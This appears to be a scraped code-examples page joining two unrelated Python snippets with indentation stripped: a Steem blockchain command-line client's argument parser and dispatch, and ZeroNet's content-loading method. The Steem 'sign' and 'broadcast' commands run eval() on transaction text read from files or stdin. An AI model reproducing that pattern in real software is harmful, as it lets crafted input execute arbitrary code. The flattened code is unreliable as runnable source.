parser_post = subparsers.add_parser('post', help='Post something new')
parser_post.set_defaults(command="post")
parser_post.add_argument(
'--author',
type=str,
required=False,
default=config["default_author"],
help='Publish post as this user (requires the key to be installed in the wallet)'
)
parser_post.add_argument(
'--permlink',
type=str,
required=False,
help='The permlink (together with the author identifies the post uniquely)'
)
parser_post.add_argument(
'--category',
default=config["post_category"],
type=str,
help='Specify category'
)
parser_post.add_argument(
'--tags',
default=[],
help='Specify tags',
nargs='*',
)
parser_post.add_argument(
'--title',
type=str,
required=False,
help='Title of the post'
)
parser_post.add_argument(
'--file',
type=str,
default=None,
help='Filename to open. If not present, or "-", stdin will be used'
)
"""
Command "reply"
"""
reply = subparsers.add_parser('reply', help='Reply to an existing post')
reply.set_defaults(command="reply")
reply.add_argument(
'replyto',
type=str,
help='@author/permlink-identifier of the post to reply to (e.g. @xeroc/python-steem-0-1)'
)
reply.add_argument(
'--author',
type=str,
required=False,
default=config["default_author"],
help='Publish post as this user (requires the key to be installed in the wallet)'
)
reply.add_argument(
'--permlink',
type=str,
required=False,
help='The permlink (together with the author identifies the post uniquely)'
)
reply.add_argument(
'--title',
type=str,
required=False,
help='Title of the post'
)
reply.add_argument(
'--file',
type=str,
required=False,
help='Send file as response. If "-", read from stdin'
)
"""
Command "edit"
"""
parser_edit = subparsers.add_parser('edit', help='Edit an existing post')
parser_edit.set_defaults(command="edit")
parser_edit.add_argument(
'post',
type=str,
help='@author/permlink-identifier of the post to edit (e.g. @xeroc/python-steem-0-1)'
)
parser_edit.add_argument(
'--author',
type=str,
required=False,
default=config["default_author"],
help='Post an edit as another author'
)
parser_edit.add_argument(
'--file',
type=str,
required=False,
help='Patch with content of this file'
)
parser_edit.add_argument(
'--replace',
action='store_true',
help="Don't patch but replace original post (will make you lose votes)"
)
"""
Command "upvote"
"""
parser_upvote = subparsers.add_parser('upvote', help='Upvote a post')
parser_upvote.set_defaults(command="upvote")
parser_upvote.add_argument(
'post',
type=str,
help='@author/permlink-identifier of the post to upvote (e.g. @xeroc/python-steem-0-1)'
)
parser_upvote.add_argument(
'--voter',
type=str,
required=False,
default=config["default_voter"],
help='The voter account name'
)
parser_upvote.add_argument(
'--weight',
type=float,
default=config["default_vote_weight"],
required=False,
help='Actual weight (from 0.1 to 100.0)'
)
"""
Command "downvote"
"""
parser_downvote = subparsers.add_parser('downvote', help='Downvote a post')
parser_downvote.set_defaults(command="downvote")
parser_downvote.add_argument(
'--voter',
type=str,
default=config["default_voter"],
help='The voter account name'
)
parser_downvote.add_argument(
'post',
type=str,
help='@author/permlink-identifier of the post to downvote (e.g. @xeroc/python-steem-0-1)'
)
parser_downvote.add_argument(
'--weight',
type=float,
default=config["default_vote_weight"],
required=False,
help='Actual weight (from 0.1 to 100.0)'
)
"""
Command "replies"
"""
replies = subparsers.add_parser('replies', help='Show recent replies to your posts')
replies.set_defaults(command="replies")
replies.add_argument(
'--author',
type=str,
required=False,
default=config["default_author"],
help='Show replies to this author'
)
replies.add_argument(
'--limit',
type=int,
default=config["limit"],
help='Limit posts by number'
)
"""
Command "transfer"
"""
parser_transfer = subparsers.add_parser('transfer', help='Transfer STEEM')
parser_transfer.set_defaults(command="transfer")
parser_transfer.add_argument(
'to',
type=str,
help='Recipient'
)
parser_transfer.add_argument(
'amount',
type=float,
help='Amount to transfer'
)
parser_transfer.add_argument(
'asset',
type=str,
choices=["STEEM", "SBD"],
help='Asset to transfer (i.e. STEEM or SBD)'
)
parser_transfer.add_argument(
'memo',
type=str,
nargs="?",
default="",
help='Optional memo'
)
parser_transfer.add_argument(
'--account',
type=str,
required=False,
default=config["default_author"],
help='Transfer from this account'
)
"""
Command "powerup"
"""
parser_powerup = subparsers.add_parser('powerup', help='Power up (vest STEEM as STEEM POWER)')
parser_powerup.set_defaults(command="powerup")
parser_powerup.add_argument(
'amount',
type=str,
help='Amount of VESTS to powerup'
)
parser_powerup.add_argument(
'--account',
type=str,
required=False,
default=config["default_author"],
help='Powerup from this account'
)
parser_powerup.add_argument(
'--to',
type=str,
required=False,
default=config["default_author"],
help='Powerup this account'
)
"""
Command "powerdown"
"""
parser_powerdown = subparsers.add_parser('powerdown', help='Power down (start withdrawing STEEM from STEEM POWER)')
parser_powerdown.set_defaults(command="powerdown")
parser_powerdown.add_argument(
'amount',
type=str,
help='Amount of VESTS to powerdown'
)
parser_powerdown.add_argument(
'--account',
type=str,
required=False,
default=config["default_author"],
help='powerdown from this account'
)
"""
Command "powerdownroute"
"""
parser_powerdownroute = subparsers.add_parser('powerdownroute', help='Setup a powerdown route')
parser_powerdownroute.set_defaults(command="powerdownroute")
parser_powerdownroute.add_argument(
'to',
type=str,
default=config["default_author"],
help='The account receiving either VESTS/SteemPower or STEEM.'
)
parser_powerdownroute.add_argument(
'--percentage',
type=float,
default=100,
help='The percentage of the withdrawal that goes to the "to" account'
)
parser_powerdownroute.add_argument(
'--account',
type=str,
default=config["default_author"],
help='The account which is powering down'
)
parser_powerdownroute.add_argument(
'--auto_vest',
action='store_true',
help=('Set to true if the from account should receive the VESTS as '
'VESTS, or false if it should receive them as STEEM.')
)
"""
Command "convert"
"""
parser_convert = subparsers.add_parser('convert', help='Convert STEEMDollars to Steem (takes a week to settle)')
parser_convert.set_defaults(command="convert")
parser_convert.add_argument(
'amount',
type=float,
help='Amount of SBD to convert'
)
parser_convert.add_argument(
'--account',
type=str,
required=False,
default=config["default_author"],
help='Convert from this account'
)
"""
Command "balance"
"""
parser_balance = subparsers.add_parser('balance', help='Show the balance of one or more accounts')
parser_balance.set_defaults(command="balance")
parser_balance.add_argument(
'account',
type=str,
nargs="*",
default=config["default_author"],
help='Balance of these accounts (multiple accounts allowed)'
)
"""
Command "history"
"""
parser_history = subparsers.add_parser('history', help='Show the history of an account')
parser_history.set_defaults(command="history")
parser_history.add_argument(
'account',
type=str,
nargs="?",
default=config["default_author"],
help='History of this account'
)
parser_history.add_argument(
'--limit',
type=int,
default=config["limit"],
help='Limit number of entries'
)
parser_history.add_argument(
'--memos',
action='store_true',
help='Show (decode) memos'
)
parser_history.add_argument(
'--first',
type=int,
default=99999999999999,
help='Transaction number (#) of the last transaction to show.'
)
parser_history.add_argument(
'--types',
type=str,
nargs="*",
default=[],
help='Show only these operation types'
)
"""
Command "interest"
"""
interest = subparsers.add_parser('interest', help='Get information about interest payment')
interest.set_defaults(command="interest")
interest.add_argument(
'account',
type=str,
nargs="*",
default=config["default_author"],
help='Inspect these accounts'
)
"""
Command "permissions"
"""
parser_permissions = subparsers.add_parser('permissions', help='Show permissions of an account')
parser_permissions.set_defaults(command="permissions")
parser_permissions.add_argument(
'account',
type=str,
nargs="?",
default=config["default_author"],
help='Account to show permissions for'
)
"""
Command "allow"
"""
parser_allow = subparsers.add_parser('allow', help='Allow an account/key to interact with your account')
parser_allow.set_defaults(command="allow")
parser_allow.add_argument(
'--account',
type=str,
nargs="?",
default=config["default_author"],
help='The account to allow action for'
)
parser_allow.add_argument(
'foreign_account',
type=str,
nargs="?",
help='The account or key that will be allowed to interact as your account'
)
parser_allow.add_argument(
'--permission',
type=str,
default="posting",
choices=["owner", "posting", "active"],
help=('The permission to grant (defaults to "posting")')
)
parser_allow.add_argument(
'--weight',
type=int,
default=None,
help=('The weight to use instead of the (full) threshold. '
'If the weight is smaller than the threshold, '
'additional signatures are required')
)
parser_allow.add_argument(
'--threshold',
type=int,
default=None,
help=('The permission\'s threshold that needs to be reached '
'by signatures to be able to interact')
)
"""
Command "disallow"
"""
parser_disallow = subparsers.add_parser('disallow', help='Remove the allowance of an account/key to interact with your account')
parser_disallow.set_defaults(command="disallow")
parser_disallow.add_argument(
'--account',
type=str,
nargs="?",
default=config["default_author"],
help='The account to disallow action for'
)
parser_disallow.add_argument(
'foreign_account',
type=str,
help='The account or key whose allowance to interact as your account will be removed'
)
parser_disallow.add_argument(
'--permission',
type=str,
default="posting",
choices=["owner", "posting", "active"],
help=('The permission to remove (defaults to "posting")')
)
parser_disallow.add_argument(
'--threshold',
type=int,
default=None,
help=('The permission\'s threshold that needs to be reached '
'by signatures to be able to interact')
)
"""
Command "newaccount"
"""
parser_newaccount = subparsers.add_parser('newaccount', help='Create a new account')
parser_newaccount.set_defaults(command="newaccount")
parser_newaccount.add_argument(
'accountname',
type=str,
help='New account name'
)
parser_newaccount.add_argument(
'--account',
type=str,
required=False,
default=config["default_author"],
help='Account that pays the fee'
)
"""
Command "importaccount"
"""
parser_importaccount = subparsers.add_parser('importaccount', help='Import an account using a passphrase')
parser_importaccount.set_defaults(command="importaccount")
parser_importaccount.add_argument(
'account',
type=str,
help='Account name'
)
"""
Command "updateMemoKey"
"""
parser_updateMemoKey = subparsers.add_parser('updatememokey', help='Update an account\'s memo key')
parser_updateMemoKey.set_defaults(command="updatememokey")
parser_updateMemoKey.add_argument(
'--account',
type=str,
nargs="?",
default=config["default_author"],
help='The account to update the memo key for'
)
parser_updateMemoKey.add_argument(
'--key',
type=str,
default=None,
help='The new memo key'
)
"""
Command "sign"
"""
parser_sign = subparsers.add_parser('sign', help='Sign a provided transaction with available and required keys')
parser_sign.set_defaults(command="sign")
parser_sign.add_argument(
'--file',
type=str,
required=False,
help='Load transaction from file. If "-", read from stdin (defaults to "-")'
)
"""
Command "broadcast"
"""
parser_broadcast = subparsers.add_parser('broadcast', help='broadcast a signed transaction')
parser_broadcast.set_defaults(command="broadcast")
parser_broadcast.add_argument(
'--file',
type=str,
required=False,
help='Load transaction from file. If "-", read from stdin (defaults to "-")'
)
"""
Command "web"
"""
webconfig = subparsers.add_parser('web', help='Launch web version of piston')
webconfig.set_defaults(command="web")
webconfig.add_argument(
'--port',
type=int,
default=config["web:port"],
help='Port to open for internal web requests'
)
webconfig.add_argument(
'--host',
type=str,
default=config["web:host"],
help='Host address to listen to'
)
"""
Command "orderbook"
"""
orderbook = subparsers.add_parser('orderbook', help='Obtain orderbook of the internal market')
orderbook.set_defaults(command="orderbook")
orderbook.add_argument(
'--chart',
action='store_true',
help="Enable charting (requires matplotlib)"
)
"""
Command "buy"
"""
parser_buy = subparsers.add_parser('buy', help='Buy STEEM or SBD from the internal market')
parser_buy.set_defaults(command="buy")
parser_buy.add_argument(
'amount',
type=float,
help='Amount to buy'
)
parser_buy.add_argument(
'asset',
type=str,
choices=["STEEM", "SBD"],
help='Asset to buy (i.e. STEEM or SBD)'
)
parser_buy.add_argument(
'price',
type=float,
help='Limit buy price denoted in (SBD per STEEM)'
)
parser_buy.add_argument(
'--account',
type=str,
required=False,
default=config["default_account"],
help='Buy with this account (defaults to "default_account")'
)
"""
Command "sell"
"""
parser_sell = subparsers.add_parser('sell', help='Sell STEEM or SBD from the internal market')
parser_sell.set_defaults(command="sell")
parser_sell.add_argument(
'amount',
type=float,
help='Amount to sell'
)
parser_sell.add_argument(
'asset',
type=str,
choices=["STEEM", "SBD"],
help='Asset to sell (i.e. STEEM or SBD)'
)
parser_sell.add_argument(
'price',
type=float,
help='Limit sell price denoted in (SBD per STEEM)'
)
parser_sell.add_argument(
'--account',
type=str,
required=False,
default=config["default_account"],
help='Sell from this account (defaults to "default_account")'
)
"""
Parse Arguments
"""
args = parser.parse_args()
# Logging
log = logging.getLogger(__name__)
verbosity = ["critical",
"error",
"warn",
"info",
"debug"][int(min(args.verbose, 4))]
log.setLevel(getattr(logging, verbosity.upper()))
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch = logging.StreamHandler()
ch.setLevel(getattr(logging, verbosity.upper()))
ch.setFormatter(formatter)
log.addHandler(ch)
# GrapheneAPI logging
if args.verbose > 4:
verbosity = ["critical",
"error",
"warn",
"info",
"debug"][int(min((args.verbose - 4), 4))]
gphlog = logging.getLogger("graphenebase")
gphlog.setLevel(getattr(logging, verbosity.upper()))
gphlog.addHandler(ch)
if args.verbose > 8:
verbosity = ["critical",
"error",
"warn",
"info",
"debug"][int(min((args.verbose - 8), 4))]
gphlog = logging.getLogger("grapheneapi")
gphlog.setLevel(getattr(logging, verbosity.upper()))
gphlog.addHandler(ch)
if not hasattr(args, "command"):
parser.print_help()
sys.exit(2)
# We don't require RPC for these commands
rpc_not_required = [
"set",
"config",
"web",
""]
if args.command not in rpc_not_required and args.command:
options = {
"node": args.node,
"rpcuser": args.rpcuser,
"rpcpassword": args.rpcpassword,
"nobroadcast": args.nobroadcast,
"unsigned": args.unsigned,
"expires": args.expires
}
# preload wallet with empty keys
if args.nowallet:
options.update({"wif": []})
# Signing only requires the wallet, no connection
# essential for offline/coldstorage signing
if args.command == "sign":
options.update({"offline": True})
steem = SteemConnector(**options).getSteem()
if args.command == "set":
if (args.key in ["default_author",
"default_voter",
"default_account"] and
args.value[0] == "@"):
args.value = args.value[1:]
config[args.key] = args.value
elif args.command == "config":
t = PrettyTable(["Key", "Value"])
t.align = "l"
for key in config:
if key in availableConfigurationKeys: # hide internal config data
t.add_row([key, config[key]])
print(t)
elif args.command == "info":
t = PrettyTable(["Key", "Value"])
t.align = "l"
info = steem.rpc.get_dynamic_global_properties()
median_price = steem.rpc.get_current_median_history_price()
steem_per_mvest = (
float(info["total_vesting_fund_steem"].split(" ")[0]) /
(float(info["total_vesting_shares"].split(" ")[0]) / 1e6)
)
price = (
float(median_price["base"].split(" ")[0]) /
float(median_price["quote"].split(" ")[0])
)
for key in info:
t.add_row([key, info[key]])
t.add_row(["steem per mvest", steem_per_mvest])
t.add_row(["internal price", price])
print(t)
elif args.command == "changewalletpassphrase":
steem.wallet.changePassphrase()
elif args.command == "addkey":
pub = None
if len(args.wifkeys):
for wifkey in args.wifkeys:
pub = (steem.wallet.addPrivateKey(wifkey))
if pub:
print(pub)
else:
import getpass
wifkey = ""
while True:
wifkey = getpass.getpass('Private Key (wif) [Enter to quit]:')
if not wifkey:
break
pub = (steem.wallet.addPrivateKey(wifkey))
if pub:
print(pub)
if pub:
name = steem.wallet.getAccountFromPublicKey(pub)
print("Setting new default user: %s" % name)
print("You can change these settings with:")
print(" piston set default_author x")
print(" piston set default_voter x")
config["default_author"] = name
config["default_voter"] = name
elif args.command == "delkey":
if confirm(
"Are you sure you want to delete keys from your wallet?\n"
"This step is IRREVERSIBLE! If you don't have a backup, "
"You may lose access to your account!"
):
for pub in args.pub:
steem.wallet.removePrivateKeyFromPublicKey(pub)
elif args.command == "getkey":
print(steem.wallet.getPrivateKeyForPublicKey(args.pub))
elif args.command == "listkeys":
t = PrettyTable(["Available Key"])
t.align = "l"
for key in steem.wallet.getPublicKeys():
t.add_row([key])
print(t)
elif args.command == "listaccounts":
t = PrettyTable(["Name", "Type", "Available Key"])
t.align = "l"
for account in steem.wallet.getAccounts():
t.add_row([
account["name"] or "n/a",
account["type"] or "n/a",
account["pubkey"]
])
print(t)
elif args.command == "reply":
from textwrap import indent
parent = steem.get_content(args.replyto)
if parent["id"] == "0.0.0":
print("Can't find post %s" % args.replyto)
return
reply_message = indent(parent["body"], "> ")
post = frontmatter.Post(reply_message, **{
"title": args.title if args.title else "Re: " + parent["title"],
"author": args.author if args.author else "required",
"replyto": args.replyto,
})
meta, json_meta, message = yaml_parse_file(args, initial_content=post)
for required in ["author", "title"]:
if (required not in meta or
not meta[required] or
meta[required] == "required"):
print("'%s' required!" % required)
# TODO, instead of terminating here, send the user back
# to the EDITOR
return
pprint(steem.reply(
meta["replyto"],
message,
title=meta["title"],
author=meta["author"],
meta=json_meta,
))
elif args.command == "post" or args.command == "yaml":
initmeta = {
"title": args.title if args.title else "required",
"author": args.author if args.author else "required",
"category": args.category if args.category else "required",
}
if args.tags:
initmeta["tags"] = args.tags
post = frontmatter.Post("", **initmeta)
meta, json_meta, body = yaml_parse_file(args, initial_content=post)
if not body:
print("Empty body! Not posting!")
return
for required in ["author", "title", "category"]:
if (required not in meta or
not meta[required] or
meta[required] == "required"):
print("'%s' required!" % required)
# TODO, instead of terminating here, send the user back
# to the EDITOR
return
pprint(steem.post(
meta["title"],
body,
author=meta["author"],
category=meta["category"],
meta=json_meta,
))
elif args.command == "edit":
original_post = steem.get_content(args.post)
edited_message = None
if original_post["id"] == "0.0.0":
print("Can't find post %s" % args.post)
return
post = frontmatter.Post(original_post["body"], **{
"title": original_post["title"] + " (immutable)",
"author": original_post["author"] + " (immutable)",
"tags": original_post["_tags"]
})
meta, json_meta, edited_message = yaml_parse_file(args, initial_content=post)
pprint(steem.edit(
args.post,
edited_message,
replace=args.replace,
meta=json_meta,
))
elif args.command == "upvote" or args.command == "downvote":
post = Post(steem, args.post)
if args.command == "downvote":
weight = -float(args.weight)
else:
weight = +float(args.weight)
if not args.voter:
print("Not voter provided!")
return
pprint(post.vote(weight, voter=args.voter))
elif args.command == "read":
post_author, post_permlink = resolveIdentifier(args.post)
if args.parents:
# FIXME inconsistency, use @author/permlink instead!
dump_recursive_parents(
steem.rpc,
post_author,
post_permlink,
args.parents,
format=args.format
)
if not args.comments and not args.parents:
post = steem.get_content(args.post)
if post["id"] == "0.0.0":
print("Can't find post %s" % args.post)
return
if args.format == "markdown":
body = markdownify(post["body"])
else:
body = post["body"]
if args.full:
meta = {}
for key in post:
if key in ["steem", "body"]:
continue
meta[key] = post[key]
yaml = frontmatter.Post(body, **meta)
print(frontmatter.dumps(yaml))
else:
print(body)
if args.comments:
dump_recursive_comments(
steem.rpc,
post_author,
post_permlink,
format=args.format
)
elif args.command == "categories":
categories = steem.get_categories(
sort=args.sort,
begin=args.category,
limit=args.limit
)
t = PrettyTable(["name", "discussions", "payouts"])
t.align = "l"
for category in categories:
t.add_row([
category["name"],
category["discussions"],
category["total_payouts"],
])
print(t)
elif args.command == "list":
list_posts(
steem.get_posts(
limit=args.limit,
sort=args.sort,
category=args.category,
start=args.start
),
args.columns
)
elif args.command == "replies":
if not args.author:
print("Please specify an author via --author\n "
"or define your default author with:\n"
" piston set default_author x")
else:
discussions = steem.get_replies(args.author)
list_posts(discussions[0:args.limit])
elif args.command == "transfer":
pprint(steem.transfer(
args.to,
args.amount,
args.asset,
memo=args.memo,
account=args.account
))
elif args.command == "powerup":
pprint(steem.transfer_to_vesting(
args.amount,
account=args.account,
to=args.to
))
elif args.command == "powerdown":
pprint(steem.withdraw_vesting(
args.amount,
account=args.account,
))
elif args.command == "convert":
pprint(steem.convert(
args.amount,
account=args.account,
))
elif args.command == "powerdownroute":
pprint(steem.set_withdraw_vesting_route(
args.to,
percentage=args.percentage,
account=args.account,
auto_vest=args.auto_vest
))
elif args.command == "balance":
t = PrettyTable(["Account", "STEEM", "SBD", "VESTS", "VESTS (in STEEM)"])
t.align = "r"
if isinstance(args.account, str):
args.account = [args.account]
for a in args.account:
b = steem.get_balances(a)
t.add_row([
a,
b["balance"],
b["sbd_balance"],
b["vesting_shares"],
b["vesting_shares_steem"]
])
print(t)
elif args.command == "history":
t = PrettyTable(["#", "time/block", "Operation", "Details"])
t.align = "r"
if isinstance(args.account, str):
args.account = [args.account]
if isinstance(args.types, str):
args.types = [args.types]
for a in args.account:
for b in steem.rpc.account_history(
a,
args.first,
limit=args.limit,
only_ops=args.types
):
t.add_row([
b[0],
"%s (%s)" % (b[1]["timestamp"], b[1]["block"]),
b[1]["op"][0],
format_operation_details(b[1]["op"], memos=args.memos),
])
print(t)
elif args.command == "interest":
t = PrettyTable(["Account",
"Last Interest Payment",
"Next Payment",
"Interest rate",
"Interest"])
t.align = "r"
if isinstance(args.account, str):
args.account = [args.account]
for a in args.account:
i = steem.interest(a)
t.add_row([
a,
i["last_payment"],
"in %s" % strfage(i["next_payment_duration"]),
"%.1f%%" % i["interest_rate"],
"%.3f SBD" % i["interest"],
])
print(t)
elif args.command == "permissions":
account = steem.rpc.get_account(args.account)
print_permissions(account)
elif args.command == "allow":
if not args.foreign_account:
from steembase.account import PasswordKey
pwd = get_terminal(text="Password for Key Derivation: ", confirm=True)
args.foreign_account = format(PasswordKey(args.account, pwd, args.permission).get_public(), "STM")
pprint(steem.allow(
args.foreign_account,
weight=args.weight,
account=args.account,
permission=args.permission,
threshold=args.threshold
))
elif args.command == "disallow":
pprint(steem.disallow(
args.foreign_account,
account=args.account,
permission=args.permission,
threshold=args.threshold
))
elif args.command == "updatememokey":
if not args.key:
# Loop until both match
from steembase.account import PasswordKey
pw = get_terminal(text="Password for Memo Key: ", confirm=True, allowedempty=False)
memo_key = PasswordKey(args.account, pw, "memo")
args.key = format(memo_key.get_public_key(), "STM")
memo_privkey = memo_key.get_private_key()
# Add the key to the wallet
if not args.nobroadcast:
steem.wallet.addPrivateKey(memo_privkey)
pprint(steem.update_memo_key(
args.key,
account=args.account
))
elif args.command == "newaccount":
import getpass
while True :
pw = getpass.getpass("New Account Passphrase: ")
if not pw:
print("You cannot chosen an empty password!")
continue
else:
pwck = getpass.getpass(
"Confirm New Account Passphrase: "
)
if (pw == pwck) :
break
else :
print("Given Passphrases do not match!")
pprint(steem.create_account(
args.accountname,
creator=args.account,
password=pw,
))
elif args.command == "importaccount":
from steembase.account import PasswordKey
import getpass
password = getpass.getpass("Account Passphrase: ")
posting_key = PasswordKey(args.account, password, role="posting")
active_key = PasswordKey(args.account, password, role="active")
memo_key = PasswordKey(args.account, password, role="memo")
posting_pubkey = format(posting_key.get_public_key(), "STM")
active_pubkey = format(active_key.get_public_key(), "STM")
memo_pubkey = format(memo_key.get_public_key(), "STM")
account = steem.rpc.get_account(args.account)
imported = False
if active_pubkey in [x[0] for x in account["active"]["key_auths"]]:
active_privkey = active_key.get_private_key()
steem.wallet.addPrivateKey(active_privkey)
imported = True
if posting_pubkey in [x[0] for x in account["posting"]["key_auths"]]:
posting_privkey = posting_key.get_private_key()
steem.wallet.addPrivateKey(posting_privkey)
imported = True
if memo_pubkey == account["memo_key"]:
memo_privkey = memo_key.get_private_key()
steem.wallet.addPrivateKey(memo_privkey)
imported = True
if not imported:
print("No keys matched! Invalid password?")
elif args.command == "sign":
if args.file and args.file != "-":
if not os.path.isfile(args.file):
raise Exception("File %s does not exist!" % args.file)
with open(args.file) as fp:
tx = fp.read()
else:
tx = sys.stdin.read()
tx = eval(tx)
pprint(steem.sign(tx))
elif args.command == "broadcast":
if args.file and args.file != "-":
if not os.path.isfile(args.file):
raise Exception("File %s does not exist!" % args.file)
with open(args.file) as fp:
tx = fp.read()
else:
tx = sys.stdin.read()
tx = eval(tx)
steem.broadcast(tx)
elif args.command == "web":
SteemConnector(node=args.node,
rpcuser=args.rpcuser,
rpcpassword=args.rpcpassword,
nobroadcast=args.nobroadcast,
num_retries=1)
from . import web
web.run(port=args.port, host=args.host)
elif args.command == "orderbook":
if args.chart:
try:
import numpy
import Gnuplot
from itertools import accumulate
except:
print("To use --chart, you need gnuplot and gnuplot-py installed")
sys.exit(1)
orderbook = steem.dex().returnOrderBook()
if args.chart:
g = Gnuplot.Gnuplot()
g.title("Steem internal market - SBD:STEEM")
g.xlabel("price")
g.ylabel("volume")
g("""
set style data line
set term xterm
set border 15
""")
xbids = [x["price"] for x in orderbook["bids"]]
ybids = list(accumulate([x["sbd"] for x in orderbook["bids"]]))
dbids = Gnuplot.Data(xbids, ybids, with_="lines")
xasks = [x["price"] for x in orderbook["asks"]]
yasks = list(accumulate([x["sbd"] for x in orderbook["asks"]]))
dasks = Gnuplot.Data(xasks, yasks, with_="lines")
g("set terminal dumb")
g.plot(dbids, dasks) # render the bid/ask curves on the dumb (ASCII) terminal
t = PrettyTable(["bid SBD", "sum bids SBD", "bid STEEM", "sum bids STEEM",
"bid price", "+", "ask price",
"ask STEEM", "sum asks steem", "ask SBD", "sum asks SBD"])
t.align = "r"
bidssteem = 0
bidssbd = 0
askssteem = 0
askssbd = 0
for i, o in enumerate(orderbook["asks"]):
bidssbd += orderbook["bids"][i]["sbd"]
bidssteem += orderbook["bids"][i]["steem"]
askssbd += orderbook["asks"][i]["sbd"]
askssteem += orderbook["asks"][i]["steem"]
t.add_row([
"%.3f Ṩ" % orderbook["bids"][i]["sbd"],
"%.3f ∑" % bidssbd,
"%.3f ȿ" % orderbook["bids"][i]["steem"],
"%.3f ∑" % bidssteem,
"%.3f Ṩ/ȿ" % orderbook["bids"][i]["price"],
"|",
"%.3f Ṩ/ȿ" % orderbook["asks"][i]["price"],
"%.3f ȿ" % orderbook["asks"][i]["steem"],
"%.3f ∑" % askssteem,
"%.3f Ṩ" % orderbook["asks"][i]["sbd"],
"%.3f ∑" % askssbd])
print(t)
elif args.command == "buy":
if args.asset == "SBD":
price = 1.0 / args.price
else:
price = args.price
pprint(steem.buy(
args.amount,
args.asset,
price,
account=args.account
))
elif args.command == "sell":
if args.asset == "SBD":
price = 1.0 / args.price
else:
price = args.price
pprint(steem.sell(
args.amount,
args.asset,
price,
account=args.account
))
else:
print("No valid command given")
0
Example 59
def loadContent(self, content_inner_path="content.json", add_bad_files=True, delete_removed_files=True, load_includes=True, force=False):
content_inner_path = content_inner_path.strip("/") # Remove / from beginning
old_content = self.contents.get(content_inner_path)
content_path = self.site.storage.getPath(content_inner_path)
content_dir = helper.getDirname(self.site.storage.getPath(content_inner_path))
content_inner_dir = helper.getDirname(content_inner_path)
if os.path.isfile(content_path):
try:
# Check if file is newer than what we have
if not force and old_content and not self.site.settings.get("own"):
for line in open(content_path):
if '"modified"' not in line:
continue
match = re.search("([0-9\.]+),$", line.strip(" \r\n"))
if match and float(match.group(1)) <= old_content.get("modified", 0):
self.log.debug("%s loadContent same json file, skipping" % content_inner_path)
return [], []
new_content = json.load(open(content_path))
except Exception, err:
self.log.warning("%s load error: %s" % (content_path, Debug.formatException(err)))
return [], []
else:
self.log.warning("Content.json not exist: %s" % content_path)
return [], [] # Content.json not exist
try:
# Get the files where the sha512 changed
changed = []
deleted = []
# Check changed
for relative_path, info in new_content.get("files", {}).iteritems():
if "sha512" in info:
hash_type = "sha512"
else: # Backward compatibility
hash_type = "sha1"
new_hash = info[hash_type]
if old_content and old_content["files"].get(relative_path): # We have the file in the old content
old_hash = old_content["files"][relative_path].get(hash_type)
else: # The file is not in the old content
old_hash = None
if old_hash != new_hash:
changed.append(content_inner_dir + relative_path)
# Check changed optional files
for relative_path, info in new_content.get("files_optional", {}).iteritems():
file_inner_path = content_inner_dir + relative_path
new_hash = info["sha512"]
if old_content and old_content.get("files_optional", {}).get(relative_path):
# We have the file in the old content
old_hash = old_content["files_optional"][relative_path].get("sha512")
if old_hash != new_hash and self.site.isDownloadable(file_inner_path):
changed.append(file_inner_path) # Download new file
elif old_hash != new_hash and self.hashfield.hasHash(old_hash) and not self.site.settings.get("own"):
try:
self.optionalRemove(file_inner_path, old_hash, old_content["files_optional"][relative_path]["size"])
self.site.storage.delete(file_inner_path)
self.log.debug("Deleted changed optional file: %s" % file_inner_path)
except Exception, err:
self.log.debug("Error deleting file %s: %s" % (file_inner_path, err))
else: # The file is not in the old content
if self.site.isDownloadable(file_inner_path):
changed.append(file_inner_path) # Download new file
# Check deleted
if old_content:
old_files = dict(
old_content.get("files", {}),
**old_content.get("files_optional", {})
)
new_files = dict(
new_content.get("files", {}),
**new_content.get("files_optional", {})
)
deleted = [key for key in old_files if key not in new_files]
if deleted and not self.site.settings.get("own"):
# Delete files that are no longer in content.json
for file_relative_path in deleted:
file_inner_path = content_inner_dir + file_relative_path
try:
self.site.storage.delete(file_inner_path)
# Check if the deleted file is optional
if old_content.get("files_optional") and old_content["files_optional"].get(file_relative_path):
old_hash = old_content["files_optional"][file_relative_path].get("sha512")
if self.hashfield.hasHash(old_hash):
self.optionalRemove(file_inner_path, old_hash, old_content["files_optional"][file_relative_path]["size"])
self.log.debug("Deleted file: %s" % file_inner_path)
except Exception, err:
self.log.debug("Error deleting file %s: %s" % (file_inner_path, err))
# Cleanup empty dirs
tree = {root: [dirs, files] for root, dirs, files in os.walk(self.site.storage.getPath(content_inner_dir))}
for root in sorted(tree, key=len, reverse=True):
dirs, files = tree[root]
if dirs == [] and files == []:
root_inner_path = self.site.storage.getInnerPath(root.replace("\\", "/"))
self.log.debug("Empty directory: %s, cleaning up." % root_inner_path)
try:
self.site.storage.deleteDir(root_inner_path)
# Remove from tree dict to reflect changed state
tree[os.path.dirname(root)][0].remove(os.path.basename(root))
except Exception, err:
self.log.debug("Error deleting empty directory %s: %s" % (root_inner_path, err))
# Check archived
if old_content and "user_contents" in new_content and "archived" in new_content["user_contents"]:
old_archived = old_content.get("user_contents", {}).get("archived", {})
new_archived = new_content.get("user_contents", {}).get("archived", {})
self.log.debug("old archived: %s, new archived: %s" % (len(old_archived), len(new_archived)))
archived_changed = {
key: date_archived
for key, date_archived in new_archived.iteritems()
if old_archived.get(key) != new_archived[key]
}
if archived_changed:
self.log.debug("Archived changed: %s" % archived_changed)
for archived_dirname, date_archived in archived_changed.iteritems():
archived_inner_path = content_inner_dir + archived_dirname + "/content.json"
if self.contents.get(archived_inner_path, {}).get("modified", 0) < date_archived:
self.removeContent(archived_inner_path)
self.site.settings["size"] = self.getTotalSize()
# Load includes
if load_includes and "includes" in new_content:
for relative_path, info in new_content["includes"].items():
include_inner_path = content_inner_dir + relative_path
if self.site.storage.isFile(include_inner_path): # Content.json exists, load it
include_changed, include_deleted = self.loadContent(
include_inner_path, add_bad_files=add_bad_files, delete_removed_files=delete_removed_files
)
if include_changed:
changed += include_changed # Add changed files
if include_deleted:
deleted += include_deleted # Add deleted files
else: # Content.json does not exist, add to changed files
self.log.debug("Missing include: %s" % include_inner_path)
changed += [include_inner_path]
# Load blind user includes (all subdir)
if load_includes and "user_contents" in new_content:
for relative_dir in os.listdir(content_dir):
include_inner_path = content_inner_dir + relative_dir + "/content.json"
if not self.site.storage.isFile(include_inner_path):
continue # Content.json does not exist
include_changed, include_deleted = self.loadContent(
include_inner_path, add_bad_files=add_bad_files, delete_removed_files=delete_removed_files,
load_includes=False
)
if include_changed:
changed += include_changed # Add changed files
if include_deleted:
